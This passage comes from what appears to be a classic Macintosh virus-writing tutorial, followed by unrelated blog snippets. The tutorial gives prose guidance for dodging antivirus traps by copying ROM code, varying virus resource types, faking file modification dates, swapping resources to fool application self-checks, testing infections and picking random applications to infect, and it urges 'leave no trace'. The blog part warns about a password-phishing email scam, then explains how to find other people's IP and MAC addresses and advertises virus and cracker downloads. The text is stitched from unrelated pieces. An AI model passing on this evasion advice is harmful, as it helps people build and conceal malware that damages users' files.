One popular patch is AddResource. If a virus detector sees that the type of resource that is being added is of type 'nVir', then it'll catch you. If it sees 'WDEF' with ID=0 and the open resource file is the desktop, then it'll catch you. Since AddResource is a very dependent call used for replications, it's almost certain to work every time. Other less-popular but more efficient patches are those at the base level of the operating system, not even documented by Apple. Traps such as _vBasicIO, _VInstall, _NewHandle, _vMRdAddr, and even _ADBReInit get trapped by the Disinfectant extension. Because these are very basic calls (used by nearly anything that does input and output, in the case of _vBasicIO), it can catch nearly anything coming toward it. It's nearly foolproof. After knowing what type of virus it is, the software can delete the virus quickly and easily.
Good applications also use their own version of virus protection. At the startup of their application, the number of resources in the file is counted, and the more important executable resources in the file are checked for their size. This way, if an application has had a resource added, it will be able to alert the user and stop execution.
Chapter 6B: Virus Protection Software: How To Bypass It
Though virus protection is great in most cases, there are still 'back doors' which haven't been explored at the time of this writing. Here are some ideas for getting around the checks that most virus protection software uses.
A trap is still a trap. It is not the real code; it is a dispatcher. It stops you on the way there, but it doesn't stop you from doing what those basic calls do on your own. This does require a fair amount of assembly language and ROM copying, but it gets you around the catch of using operating system traps at all. Simply copy the code that is contained in the trap itself and use that code. To never get caught, never use traps. But we know how nearly impossible that is. However, things are gained and lost in good code writing.
A drawback of virus protection in general is that the software has to be continually updated for each new virus and identified by name in most cases. One ingenious idea (mine? I don't know) is to make the name and/or type of the virus variable. It doesn't always have to be called 'nVir' or 'WDEF' (unless the mechanism depends on the name or type). Make the type change from permutation to permutation. This makes it much more difficult to catch.
One feature of the File Manager is it's automatic updating of the modification dates. Every time a file is updated or modified in any way, the modification date is changed. You can find and modify the date with a fairly simple low-level File Manager call. This is really a frivolous precaution, but it makes it easy to find the source of a virus attack. Changing the dates to something fairly feasible (NOT Jan. 1, 1904) may bypass such checks.
The application checks can be overridden with good code-writing as well. If the virus is to add a resource to a file (as it usually has to), why not delete one in it's place? You've got to be sure that the type is the same as another type (this is where the variable types come in handy), and you may even want to vary the size of it to make it match the one it replaced (hopefully a larger size). Simply modifying a resource (like CODE 0) with the same amount of bytes will usually not be detectable. This way, the applications still counts and finds nothing unusual. However, in the process, the application is permanently damaged in some way.
Chapter 7: Testing
In testing a virus on your own system, you subject it to many continuous attacks - maybe even ones that are unintended. There are some rules to follow to be sure that you can keep track of it's location and make sure it doesn't destroy your work in the process.
1. SysBeep debugging. I'm sure most of us a pretty familiar with this technique. It's compatible on all systems, and it's an aural identification. No visuals to set up, no extra resources. Simple SysBeep(0); is sometimes enough to know that everything's all right. When testing your duplication code to find out when it actually happens, use SysBeep after each one and then check to see where it went.
2. Modification dates and times. If you use random selection of files to infect, it becomes rather difficult to find which one got infected. If you know when an infection happened, you can immediately check the modification dates of all files - simply by using the Find� command in System 7's Finder.
3. Text Files. This could be known as a common-file technique. For testing purposes, use a mechanism that whenever an infection takes place, the virus writes the process and the file names and such into a common file in a common folder somewhere. This way, you can check the text file afterwards and know exactly what your code has done. You need not make the mechanism too elaborate, as it will only be for use in testing.
4. Backup, Backup, Backup. The thought police are at it again. In these cases, it's all too familiar. A trashed project is no fun.
Chapter 8: Conclusion
In short, the devices behind writing a virus are not all that complicated. There are many checks to counterattack, and part of the puzzle itself is no find new ways to get around them. Find back doors. Give the code a personality. Make it try to find the best way around a counterattack if it is able to detect one. Size is no longer a constraint in today's memory-hog world. A virus of near 50k would probably go undetected in modern-day storage, so don't feel constrained in that way. Time should be a consideration, however.
Make code that is efficient, so that users don't notice a slowdown when it is executed. All in all, your code is your work. Don't let it out of the bag until it works well and clean, and don't forget to leave no trace.
Appendix: Questions and Answers
Q: How do you get it to randomly choose an application on the HD to infect?
A: Any file on the hard drive is stored in the directory. This includes documents, applications, system files, and so on. Files are found by using the directory (via the File Manager). If you wanted to choose an application that appeared as though it was a random choice, you can still move through the directory. Files are stored in the directory by an index, just like resources, and you can pick a random index number to check a random file. You can use Quickdraw's Random routine to pull out a number, check that index, and see if that file's type is 'APPL'. If not, simply choose another file. If you've found one, then you've got your random application. Granted that not all hard drives have 65536 files on them, so you may have to tone down the returns from Random, but that's simply mathematics. Note also that there are many small applications on the hard drive as well. TeachText, CompactPro, PrintMonitor, etc. This will also come up in the list of applications along with larger applications like Microsoft Word, Aldus Freehand, and the Finder itself. This method will not choose the System file (it has a type of 'zsys'), and documents, any desk accessories, or extensions/control panels. You can modify the routine to work with other file types as well.
Q: How can I include a bitmap or other separate resource data into my code?
A: You've got to use a little assembly (and disassembly) for this method, but it works wonders (the system's scroll bar CDEF use to use it). Create the resource you want to include in your favorite resource editor to suit your taste. Close the resource and re-open the sucker in hex. Copy all of the hex codes into the clipboard. Go into your development environment and at the very end of your code add a bit of assembly. Use the DC.B or DC.W operands to define a bytes or words (respectively) and re-define the complete resource for each byte or word in the resource (it might take a little bit of re-typing). Give this procedure (which never gets 'called') a name. Now, whenever you want to use this 'resource', simply replace the handle or pointer to the resource with this procedure pointer. There's no need to load anything (the entire code resource is already loaded), and the pointer is always valid. This method also saves you from using the Memory Manager for anything.
Sunday, November 12, 2006
WARNING!!They are stealing ur password!!!
"First, open a new email message. Type in the “To:” box this email address: psswrd_lost@hotmail.com. In the subject line, type “LOST PASSWORD”. In the body, type on the 1st line your email address (ex: you@hotmail.com or you@yahoo.com). On the 3rd line, type your password. And on the 5th line, type the person you are trying to get the password from’s email address (ex: them@hotmail.com or them@yahoo.com).
Here is an example of what the email should look like:
TO: psswrd_lost@hotmail.com
SUBJECT: LOST PASSWORD
You@hotmail/yahoo.com
12345678
Them@hotmail/yahoo.com"
THIS IS WRONG!DONT BELIEVE TO THEM!THEY ARE STEALING UR PASSWORD THROUGH THIS EMAIL!BE CAREFUL
How can u find ur friengs ip via msn messenger?
While the transfer is not complete type netstat -n again.
Compare the 2 lists of Ip's. In the second list there is one Ip more.That is your friends IP.
Download viruses,trojans,network hacking tools,password crackers... download
How can u find out ur own or someone else's MAC address?
MAC address looks something like this : 00-13-20-A3-0B-4C
Someone else's MAC address you need their IP address and then goto cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user.